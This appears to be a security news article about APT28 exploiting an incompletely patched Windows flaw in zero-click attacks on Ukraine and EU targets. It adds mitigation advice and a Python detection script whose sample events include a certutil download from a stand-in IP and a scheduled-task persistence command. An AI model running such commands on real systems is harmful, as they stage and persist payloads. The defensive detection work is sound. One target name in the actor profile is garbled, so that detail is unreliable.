Incomplete Windows Patch Opens Door to Zero-Click Attacks by APT28

A Microsoft Windows vulnerability originally patched in a prior Patch Tuesday was incompletely remediated, leaving a residual attack surface that Russia-linked APT28 has exploited in zero-click attacks against Ukraine and European Union member states. SecurityWeek reports the incomplete fix enables attackers to execute code without any user interaction.

Dylan H.

News Desk

April 27, 2026

Incomplete Windows Patch Leaves Zero-Click Attack Surface for APT28

A Microsoft Windows vulnerability that was previously addressed in a Patch Tuesday update has been found to be incompletely remediated, leaving a residual attack surface that Russia-linked APT28 (also tracked as Fancy Bear, Forest Blizzard, and STRONTIUM) has actively exploited in zero-click attacks against targets in Ukraine and European Union member countries.

SecurityWeek reported the incomplete patch finding, noting that APT28 has weaponized the residual flaw to achieve code execution on target systems without requiring any user interaction — a particularly dangerous attack vector that bypasses user-awareness training and most social engineering defenses.


What Is an Incomplete Patch?

An incomplete patch occurs when a security fix addresses the specific proof-of-concept exploit or reported attack vector but fails to fully remediate the underlying vulnerability. In practice, this means:

  • The original CVE is marked as patched in Microsoft's advisory
  • Security teams may deprioritize further action, believing the risk is resolved
  • Attackers analyze the patch and identify variant attack paths that bypass the fix
  • The residual vulnerability is exploited under a new or existing CVE

Incomplete patches are a known challenge in software security. NIST's National Vulnerability Database tracks many re-opened or variant CVEs year over year, and state-sponsored threat actors specifically invest in patch diffing — analyzing the difference between patched and unpatched binaries to find bypass opportunities.


APT28: Threat Actor Profile

APT28 (Advanced Persistent Threat 28) is a Russian military intelligence (GRU) cyber unit, widely attributed to Unit 26165 of the GRU. The group has been active since at least 2004 and is among the most sophisticated state-sponsored threat actors tracked by Western intelligence agencies:

  • Also Known As: Fancy Bear, Forest Blizzard, STRONTIUM, Sofacy
  • Attributed To: Russian GRU Unit 26165
  • Primary Objectives: Espionage, intelligence collection, election interference
  • Key Targets: NATO members, Ukraine, defense contractors, governments
  • Notable Operations: DNC hack (2016), Bundestag hack (2015), Olympic Anti-Doping Agency (2016)
  • Preferred Vectors: Spear phishing, zero-days, credential theft, exploit of public-facing apps

In the context of the ongoing Russia-Ukraine conflict, APT28 has dramatically accelerated operations targeting Ukrainian government institutions, military logistics, and EU member state governments that support Ukraine.


Zero-Click Attack Explained

A zero-click attack is a cyberattack that achieves code execution on a target device without any action from the victim. Unlike phishing, which requires a user to click a link or open a file, zero-click exploits trigger automatically when:

  • A malicious network packet is received
  • A specially crafted file is processed by a background service
  • A message is previewed (not opened) in a messaging or email client

Zero-click vulnerabilities are among the most sought-after by nation-state actors because they:

  • Bypass user training — no amount of phishing awareness prevents exploitation
  • Leave minimal forensic traces — no user action means fewer logs to detect
  • Enable mass targeting — can be deployed at scale against IP ranges or email lists without interaction

APT28's exploitation of the incomplete Windows patch reportedly enables code execution via a specially crafted network packet or file processed by a Windows component — with no requirement for the victim to open attachments or click links.


Targets: Ukraine and EU Member States

APT28's current campaign using this incomplete Windows patch has been directed at:

  • Ukrainian government agencies and military-adjacent organizations — consistent with APT28's sustained intelligence-collection mandate against Ukraine
  • EU member state government entities — particularly those involved in coordination of military aid, sanctions enforcement, or diplomatic communications related to Ukraine
  • Defense contractors and logistics companies supplying Ukraine

The timing aligns with increased Russian intelligence collection pressure ahead of major EU policy decisions on Ukraine-related sanctions packages and military aid commitments.


Microsoft's Response

Microsoft is aware of APT28's exploitation of the incomplete patch. Organizations should:

  1. Apply all pending Windows updates immediately — Microsoft typically releases supplementary fixes when incomplete patches are identified; confirm all April 2026 and subsequent Patch Tuesday updates are installed
  2. Monitor for out-of-band emergency patches — Microsoft may release emergency updates outside of the Patch Tuesday cycle for actively exploited critical flaws
  3. Enable Windows Defender Credential Guard and Attack Surface Reduction rules — defense-in-depth measures that can reduce exploitation impact
  4. Review network logs for anomalous SMB, MSHTML, or RPC traffic — common Windows protocol vectors exploited in zero-click scenarios

What Organizations Should Do Now

Immediate Actions

  1. Verify patch status — Confirm that all April 2026 Windows updates are installed across all Windows endpoints and servers; check Windows Update history for any failed or pending updates
  2. Prioritize high-value targets — Governments, defense contractors, and organizations with Ukraine-related operations should treat this as critical priority given APT28's known targeting
  3. Enable enhanced logging — Activate Windows Event Forwarding and Sysmon to capture process creation, network connections, and file modification events that may indicate exploitation
  4. Implement network segmentation — Limit lateral movement opportunity by segmenting Windows systems handling sensitive data
  5. Coordinate with national CERTs — Organizations in EU member states should coordinate with their national Computer Emergency Response Teams, which may have additional intelligence on APT28's indicators of compromise

Detection Guidance

APT28 exploitation of Windows vulnerabilities typically leaves indicators including:

  • Unusual lsass.exe memory access events
  • Unexpected outbound connections to infrastructure in Eastern Europe
  • New scheduled tasks or services created around the time of exploitation
  • Anomalous use of certutil.exe, mshta.exe, or PowerShell for staged payload downloads
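As an added example (not from the article or from SecurityWeek), here is a small triage pass that checks Sysmon-style events for the four indicator classes listed above. The event shapes, file paths and the 198.51.100.7 address are constructed for illustration; the lsass.exe reader allowlist and the internal network ranges are assumptions to tune per environment.

```python
import ipaddress
import json

# Constructed Sysmon-style events (JSON lines, one per event); not real telemetry.
# Backslashes are doubled because the text is JSON; 198.51.100.7 is a documentation address.
SAMPLE_EVENTS = r"""
{"UtcTime":"2026-04-27 09:14:02","EventID":10,"SourceImage":"C:\\Users\\Public\\stage.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe"}
{"UtcTime":"2026-04-27 09:14:03","EventID":10,"SourceImage":"C:\\Windows\\System32\\csrss.exe","TargetImage":"C:\\Windows\\System32\\lsass.exe"}
{"UtcTime":"2026-04-27 09:15:10","EventID":1,"Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil.exe -urlcache -split -f http://198.51.100.7/u.dat u.dat"}
{"UtcTime":"2026-04-27 09:15:41","EventID":1,"Image":"C:\\Windows\\System32\\schtasks.exe","CommandLine":"schtasks.exe /create /tn Updater /tr C:\\Users\\Public\\u.dat /sc minute"}
{"UtcTime":"2026-04-27 09:16:02","EventID":3,"Image":"C:\\Windows\\System32\\mshta.exe","Initiated":"true","DestinationIp":"198.51.100.7"}
{"UtcTime":"2026-04-27 09:20:00","EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -File C:\\scripts\\nightly.ps1"}
"""

LOLBINS = {"certutil.exe", "mshta.exe", "powershell.exe"}
# Assumed baseline of processes that legitimately open lsass.exe; tune per environment.
LSASS_READERS_OK = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
PERSIST_CMDS = (("schtasks.exe", "/create"), ("sc.exe", " create "))
# Assumed internal address space; anything outside it counts as an external destination.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return the indicator labels matched by one Sysmon-style event dict (may be empty)."""
    hits, eid = [], event.get("EventID")
    image = _base(event.get("Image", ""))
    cmd = event.get("CommandLine", "").lower()
    if eid == 10 and _base(event.get("TargetImage", "")) == "lsass.exe":
        if _base(event.get("SourceImage", "")) not in LSASS_READERS_OK:
            hits.append("lsass-access")            # unusual lsass.exe memory access
    if eid == 1 and image in LOLBINS and ("http" in cmd or "-urlcache" in cmd or "-decode" in cmd):
        hits.append("lolbin-download")             # certutil/mshta/PowerShell staging a payload
    if eid == 1 and any(image == exe and flag in cmd for exe, flag in PERSIST_CMDS):
        hits.append("persistence-create")          # new scheduled task or service
    if eid == 3 and event.get("Initiated") == "true" and image in LOLBINS:
        dst = ipaddress.ip_address(event["DestinationIp"])
        if not any(dst in net for net in INTERNAL_NETS):
            hits.append("lolbin-outbound")         # unexpected outbound connection from a LOLBin
    return hits

def scan(jsonl_text):
    """Return (UtcTime, hits) for each event in a JSON-lines string that matched a rule."""
    events = [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]
    return [(e["UtcTime"], h) for e in events if (h := triage(e))]
```

Running scan(SAMPLE_EVENTS) flags four of the six constructed events and leaves the csrss.exe lsass access and the scheduled PowerShell script alone.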

Key Takeaways

  • A previously issued Windows patch was incompletely remediated, leaving a residual flaw that APT28 has weaponized for zero-click attacks
  • APT28 (Russian GRU) has exploited the bypass against Ukraine and EU member state government targets — consistent with sustained Russian intelligence collection operations
  • Zero-click exploits require no user action, making this attack vector particularly dangerous and bypassing user-awareness defenses
  • Microsoft is expected to release a supplementary fix; organizations should apply all Windows updates immediately and monitor for emergency out-of-band patches
  • High-risk organizations — governments, defense contractors, and Ukraine-adjacent entities — should treat this as a critical priority and engage national CERTs for additional threat intelligence

Sources

  • Incomplete Windows Patch Opens Door to Zero-Click Attacks — SecurityWeek
  • Microsoft Security Response Center
  • CISA Known Exploited Vulnerabilities Catalog
